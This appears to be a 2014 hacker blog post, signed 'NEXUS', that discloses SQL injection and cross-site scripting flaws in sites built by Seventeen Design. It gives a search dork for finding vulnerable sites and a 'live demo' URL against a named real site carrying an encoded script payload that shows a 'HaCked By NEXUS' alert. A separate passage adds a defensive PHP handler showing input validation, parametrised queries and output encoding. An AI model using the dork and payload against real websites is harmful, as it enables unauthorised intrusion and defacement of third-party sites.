Friday, 4 July 2014

Seventeen Design XSS & SQLI

Dork:
intext:"Producido por: Seventeen Design."

Exploits:
http://site.com/*.*id= <SQLI>
http://site.com/*.*id= <XSS>

Live Demo:

SQLI + XSS:
http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
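The pattern the post reports, one numeric id parameter that reaches both the SQL query and the HTML response of a page like nota.php, is closed by validating, parametrising and output-encoding that parameter. The handler below is an added example, not code from Seventeen Design or from the post's author; the table and column names and the in-memory SQLite data are constructed for the demonstration.

```php
<?php
// Added example (not Seventeen Design's code): a hardened handler for a page
// such as nota.php?id=..., where one id parameter reaches both the SQL query
// and the HTML output. Table and column names are hypothetical.
declare(strict_types=1);

function fetch_note(PDO $pdo, string $raw_id): ?array
{
    // 1. Validate: the id must be a plain positive integer. A value such as
    //    9"><script>...</script> is rejected here, before SQL or HTML sees it.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Parametrise: the value is bound, never concatenated into the query.
    $stmt = $pdo->prepare('SELECT id, titulo, cuerpo FROM notas WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Encode on output: every value echoed into HTML is escaped for the HTML context.
function render_note(array $row): string
{
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>' . $h($row['titulo']) . '</h1>' . "\n"
         . '<div>' . $h($row['cuerpo']) . '</div>' . "\n";
}

// Constructed in-memory sample data so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE notas (id INTEGER PRIMARY KEY, titulo TEXT, cuerpo TEXT)');
$pdo->exec("INSERT INTO notas VALUES (9, 'Nota 9', 'Text with <b>tags</b> & \"quotes\"')");

// Served: the id comes from the query string. From the CLI: a constructed default.
// Any non-integer id (for example the payload form quoted above) ends in the 404 branch.
$raw = $_GET['id'] ?? '9';
$row = fetch_note($pdo, $raw);
if ($row === null) {
    http_response_code(404);
    exit("Note not found\n");
}
echo render_note($row);
```

The stored markup and quotes come back as `&lt;b&gt;tags&lt;/b&gt; &amp; &quot;quotes&quot;`, so nothing from the database or the request is interpreted as HTML.
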
NEXUS - Sharing Is Caring